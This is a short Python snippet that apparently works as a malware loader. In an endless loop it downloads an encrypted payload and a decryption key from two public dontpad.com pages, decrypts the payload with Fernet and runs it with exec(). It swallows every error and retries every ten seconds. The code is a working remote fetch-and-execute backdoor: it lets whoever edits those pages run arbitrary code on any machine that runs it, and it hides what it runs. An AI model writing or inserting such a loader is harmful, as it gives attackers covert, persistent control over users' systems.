while True:
    try:
        endpoint = requests.get('http://dontpad.com/FILEPAYLOAD')
        if endpoint.status_code == 200:
            data = endpoint.text.split('<textarea id="text">')[1]
            data = data.split('</textarea>')[0]
            pld = data.encode()
            endpoint = requests.get('http://dontpad.com/FILEKEY')
            if endpoint.status_code == 200:
                data = endpoint.text.split('<textarea id="text">')[1]
                data = data.split('</textarea>')[0]
                control = Fernet(data.encode())
                game = control.decrypt(pld)
                exec(game)
    except:
        pass
    sleep(10)
